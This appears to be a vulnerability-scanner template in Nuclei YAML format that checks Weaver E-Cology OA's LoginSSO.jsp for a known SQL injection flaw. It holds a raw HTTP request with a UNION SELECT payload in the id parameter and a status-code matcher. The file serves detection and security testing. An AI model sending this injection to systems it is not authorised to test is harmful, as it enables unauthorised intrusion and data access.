id: poc-yaml-e-cology-loginsso-sqli

info:
  name: poc-yaml-e-cology-loginsso-sqli
  author: hanxiansheng26
  severity: high
  tags: xray-converted,sqli,ct-479169
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.html

http:
  - raw:
      - |
        GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5({{rand_int(1000, 9999)}})%20as%20id%20from%20HrmResourceManager HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200